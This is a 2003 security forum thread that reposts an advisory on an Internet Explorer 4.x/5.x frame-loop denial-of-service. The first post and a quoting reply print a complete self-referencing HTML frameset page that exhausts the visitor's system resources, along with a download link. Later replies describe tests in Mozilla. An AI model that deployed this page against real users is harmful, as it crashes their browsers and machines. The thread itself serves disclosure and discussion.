Yet Another IE Vulnerability??- Frame Looping

Discussion in 'Computer Security' started by jayjwa, Nov 12, 2003.

  1. jayjwa

    jayjwa Guest

    Microsoft Internet Explorer 4.x 5.x - Frame Loop Vulnerability


    Microsoft Internet Explorer 4.x

    Microsoft Internet Explorer 5.x
    Frame Loop Vulnerability




    PROBLEM:

    It is possible to create a malicious webpage that when visited by an IE
    user all of their system resources are devoured and depending on the
    system its possible that the machine can even crash and reboot itself.

    The reason you can use up all of the client's resources is by creating
    an endless loop of frames.

    You create a html file that has a few frames inside it and then link
    those frames back to the same html file so every time IE loads the new
    frame it loads another new frame and another etc...

    Until after a short time your resources are all used up and your system
    crashes.

    We understand this is somewhat of a nuisance hole but still something
    that needs to be addressed.

    Example:

    -----------readme.htm------------
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <html>
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    <head>
    <title>Ussrlabs is getting hard</title>
    </head>
    <frameset framespacing="2" frameborder="no" rows="65,*">
    <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    <noframes>
    <body bgcolor="#FFFFFF">
    <p>This web page uses frames, but your browser doesn't support them.</p>
    </body>
    </noframes>
    </frameset>
    <frameset>
    <noframes>
    </noframes>
    </frameset>
    </html>
    -----------readme.htm------------

    Or if you want the html can be downloaded here.

    http://www.ussrback.com/iehole/readme.zip

    Note: It also affect Microsoft FrontPage.

    Vendor Status:

    Contacted.

    "We talked to MS and they said this is a nuisance attack and do not
    think its a security hole. So you will not be getting a patch for
    this(maybe). However, it is good to know that Netscape Navigator is not
    affected by this hole."

    Vendor Url: http://www.microsoft.com/

    Program Url: http://www.microsoft.com/windows/ie/default.htm

    Credit:

    USSRLABS

    SOLUTION:

    Nothing yet.




    I made one of those pages (frame-loop-tester.html), placed it in my
    webserver's /pub directory, and tested it against Mozilla (because I'm
    not crazy enough to run IE) on my Linux box. It did try sucking up
    system resources, and with top running in an x-term, the process tried
    to use up about 92%, at which time Linux cut it. Nothing appeared on the
    browser.



    --
    -=-=-=-=-=-=-=-=-=Atr2-WBS @ Atr2.Ath.Cx=-=-=-=-=-=-=-=-=-
    [jayjwa] Mod_SSL / GPG / OpenSSL
    "Save the 'Net, Unplug a Windows machine today!"

    =-=-=Linux Tough.Powered By Slackware=-=HTTPS/FTP=-RLF#37=
    jayjwa, Nov 12, 2003
    #1
    1. Advertising

  2. In article <>,
    says...
    >
    > Microsoft Internet Explorer 4.x 5.x - Frame Loop Vulnerability
    >
    >
    > Microsoft Internet Explorer 4.x
    >
    > Microsoft Internet Explorer 5.x
    > Frame Loop Vulnerability
    >
    >
    >
    >
    > PROBLEM:
    >
    > It is possible to create a malicious webpage that when visited by an IE
    > user all of their system resources are devoured and depending on the
    > system its possible that the machine can even crash and reboot itself.
    >
    > The reason you can use up all of the client's resources is by creating
    > an endless loop of frames.
    >
    > You create a html file that has a few frames inside it and then link
    > those frames back to the same html file so every time IE loads the new
    > frame it loads another new frame and another etc...
    >
    > Until after a short time your resources are all used up and your system
    > crashes.
    >
    > We understand this is somewhat of a nuisance hole but still something
    > that needs to be addressed.
    >
    > Example:
    >
    > -----------readme.htm------------
    > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    > <html>
    > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
    > <head>
    > <title>Ussrlabs is getting hard</title>
    > </head>
    > <frameset framespacing="2" frameborder="no" rows="65,*">
    > <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    > <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    > <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    > <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    > <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    > <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    > <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    > <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    > <frame src="readme.htm" name="top" margintop="0" scrolling="no" noresize>
    > <noframes>
    > <body bgcolor="#FFFFFF">
    > <p>This web page uses frames, but your browser doesn't support them.</p>
    > </body>
    > </noframes>
    > </frameset>
    > <frameset>
    > <noframes>
    > </noframes>
    > </frameset>
    > </html>
    > -----------readme.htm------------
    >
    > Or if you want the html can be downloaded here.
    >
    > http://www.ussrback.com/iehole/readme.zip
    >
    > Note: It also affect Microsoft FrontPage.
    >
    > Vendor Status:
    >
    > Contacted.
    >
    > "We talked to MS and they said this is a nuisance attack and do not
    > think its a security hole. So you will not be getting a patch for
    > this(maybe). However, it is good to know that Netscape Navigator is not
    > affected by this hole."
    >
    > Vendor Url: http://www.microsoft.com/
    >
    > Program Url: http://www.microsoft.com/windows/ie/default.htm
    >
    > Credit:
    >
    > USSRLABS
    >
    > SOLUTION:
    >
    > Nothing yet.
    >
    >
    >
    >
    > I made one of those pages (frame-loop-tester.html), placed it in my
    > webserver's /pub directory, and tested it against Mozilla (because I'm
    > not crazy enough to run IE) on my Linux box. It did try sucking up
    > system resources, and with top running in an x-term, the process tried
    > to use up about 92%, at which time Linux cut it. Nothing appeared on the
    > browser.
    >
    >
    >
    >




    thanks for another example of why IE should be ripped out of Windows and
    replaced with something a little less dangerous, like Lynx :)

    go ahead folks, keep running your Fat32 and NTFS as Admin... you're
    doing nothing but propagating Microsoft's demise.




    --
    Colonel Flagg
    http://www.internetwarzone.org/

    Privacy at a click:
    http://www.cotse.net

    Q: How many Bill Gates does it take to change a lightbulb?
    A: None, he just defines Darkness? as the new industry standard..."

    "...I see stupid people."
    Colonel Flagg, Nov 12, 2003
    #2
    1. Advertising

  3. Colonel Flagg Spilled my beer when they jumped on the table and
    proclaimed in <>:
    > thanks for another example of why IE should be ripped out of Windows
    > and replaced with something a little less dangerous, like Lynx :)
    >
    > go ahead folks, keep running your Fat32 and NTFS as Admin... you're
    > doing nothing but propagating Microsoft's demise.


    Running as Admin is the same as running in root. "If you play in
    root you will eventually kill the whole tree" - forget his name but
    he's in the c.o.l.s newsgroup... <G>

    NOI
    Thund3rstruck, Nov 12, 2003
    #3
  4. jayjwa

    Guest

    jayjwa <> wrote in message news:<>...
    > I made one of those pages (frame-loop-tester.html), placed it in my
    > webserver's /pub directory, and tested it against Mozilla (because I'm
    > not crazy enough to run IE) on my Linux box. It did try sucking up
    > system resources, and with top running in an x-term, the process tried
    > to use up about 92%, at which time Linux cut it. Nothing appeared on the
    > browser.


    As a local file, Mozilla on XP Pro (work) loaded the page but stopped.
    Didn't lock, didn't die, just finished at some point.
    , Nov 12, 2003
    #4
  5. jayjwa

    Beavis Guest

    > PROBLEM:
    >
    > It is possible to create a malicious webpage that when visited by an IE
    > user all of their system resources are devoured and depending on the
    > system its possible that the machine can even crash and reboot itself.
    >

    Isn't this IE's default behavior?
    Beavis, Nov 12, 2003
    #5
  6. Beavis wrote:
    >>PROBLEM:
    >>
    >>It is possible to create a malicious webpage that when visited by an IE
    >>user all of their system resources are devoured and depending on the
    >>system its possible that the machine can even crash and reboot itself.
    >>

    >
    > Isn't this IE's default behavior?


    I see lots of Mozilla's but no one tried it on IE yet?


    -jayjwa
    @micro$oft.com, Nov 13, 2003
    #6
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. Tech.News

    IE: Yet Another Vulnerability!

    Tech.News, Aug 18, 2004, in forum: Computer Support
    Replies:
    1
    Views:
    385
    Samuel Townsend
    Nov 2, 2004
  2. stephen
    Replies:
    0
    Views:
    448
    stephen
    Oct 1, 2006
  3. PhilÅ

    Command Prompt Looping problems

    PhilÅ, May 21, 2006, in forum: Computer Support
    Replies:
    17
    Views:
    790
    Ponder
    May 21, 2006
  4. Jazz
    Replies:
    0
    Views:
    769
  5. Martin Knight

    DVD Auto Looping

    Martin Knight, Jun 18, 2007, in forum: Computer Support
    Replies:
    5
    Views:
    1,571
    Martin Knight
    Jun 19, 2007
Loading...

Share This Page